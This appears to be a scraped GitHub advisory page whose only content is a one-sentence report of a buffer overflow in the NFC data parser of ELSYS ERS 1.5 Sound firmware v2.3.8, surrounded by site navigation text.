ELSYS ERS 1.5 Sound v2.3.8 was discovered to contain a buffer overflow via the NFC data parser.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

Tag

#buffer_overflow